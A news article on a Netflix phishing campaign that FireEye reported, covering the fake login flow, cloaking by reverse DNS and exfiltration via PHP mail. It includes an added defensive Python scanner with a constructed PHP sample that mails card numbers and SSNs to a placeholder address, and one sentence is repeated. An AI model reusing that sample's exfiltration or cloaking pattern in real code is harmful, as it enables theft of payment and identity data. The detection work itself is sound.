Netflix customers may find themselves in receipt of an unexpectedly high credit card bill if they are not careful – as a new phishing scheme threatens to get hold of their credit card details as well as other personal details.
FireEye, an online security firm, tells us that the approach from scammers begins when a Netflix subscriber receives a notification requesting that they update their membership. This notification incorporates a link to a false login page. Once users sign in, another page appears requesting members to confirm a number of personal pieces of information, including name, date of birth and address. This stage is followed by a request for Social Security number details and payment card information. After this stage has been completed, members are directed on to the actual Netflix homepage. In phishing terms these are typical tactics, but there is more to the campaign than appears on the surface, namely the ways in which it remains undetected. At one time all of the phishing pages were hosted on legitimate (though compromised) web servers. The pages are not shown to users from certain IP addresses if their DNS resolves to companies like PhishTank or Google.
There is one more clever way that the phishing campaign steers clear of detection.
This is explained by Mohammed Mohsin Dalla of FireEye in a recent blog post:
Every bit of information stolen from a user is sent to the attackers via the PHP mail utility, which means the bad actors can host the phishing pages on multiple websites and receive stolen credentials from a single email account.
All of the information stolen from a user is sent to the attackers by the PHP mail utility. This lets the bad actors host the phishing pages on numerous websites and receive the stolen information at a single email account.
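A defensive sketch of the two behaviours described above, for site owners checking a web root for a planted kit: it flags PHP files that send sensitive-looking form fields to `mail()` and files that gate their output on a reverse-DNS lookup. This is an added example, not FireEye's code or the kit's; the regexes, the field keywords, `gethostbyaddr()` as the lookup, and both sample snippets are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristic patterns over PHP source text (assumed, tune for your code base).
MAIL_CALL = re.compile(r"(?<![\w>$])mail\s*\(", re.I)  # bare mail(), not ->mail()
FORM_FIELD = re.compile(r"\$_(?:POST|REQUEST)\s*\[\s*['\"]([^'\"]+)['\"]")
SENSITIVE = re.compile(r"ssn|social|card|cvv|dob|birth|pass", re.I)
REVERSE_DNS = re.compile(r"\bgethostbyaddr\s*\(", re.I)
HOST_COMPARE = re.compile(r"\b(?:strpos|stripos|preg_match|in_array)\s*\(", re.I)

# Constructed sample: reverse-DNS gate plus form fields mailed out.
SAMPLE_FLAGGED = """<?php
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
if (stripos($host, 'scanner.example') !== false) { exit; }
$body = $_POST['card_number'] . $_POST['ssn'];
mail('inbox@example.invalid', 'x', $body);
"""

# Constructed sample: an ordinary contact form, which must not be flagged.
SAMPLE_BENIGN = """<?php
$msg = $_POST['message'];
mail('support@example.invalid', 'Contact form', $msg);
"""


def inspect_php(source):
    """Return a list of findings for one PHP file's source text."""
    findings = []
    fields = FORM_FIELD.findall(source)
    sensitive = sorted({f for f in fields if SENSITIVE.search(f)})
    if MAIL_CALL.search(source) and sensitive:
        findings.append("form-to-mail: " + ",".join(sensitive))
    if REVERSE_DNS.search(source) and HOST_COMPARE.search(source):
        findings.append("rdns-cloaking")
    return findings


def scan_webroot(root):
    """Map each flagged .php file under root to its findings."""
    flagged = {}
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        findings = inspect_php(text)
        if findings:
            flagged[str(path)] = findings
    return flagged
```

A hit is a prompt for manual review, not proof of compromise; comparing flagged files against the site's known-good deployment narrows the list quickly.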
Netflix, which initiated a password reset process in June 2016 after a period of major breaches, asks users to learn ways to keep themselves safe online by going to https://www.netflix.com/security. This page acts as a reminder for users that Netflix does not ask for personal information via email. Users are also reminded that it is unwise to click on links or email attachments that appear suspicious.
As of the creation of this article, the phishing pages in question are no longer accessible.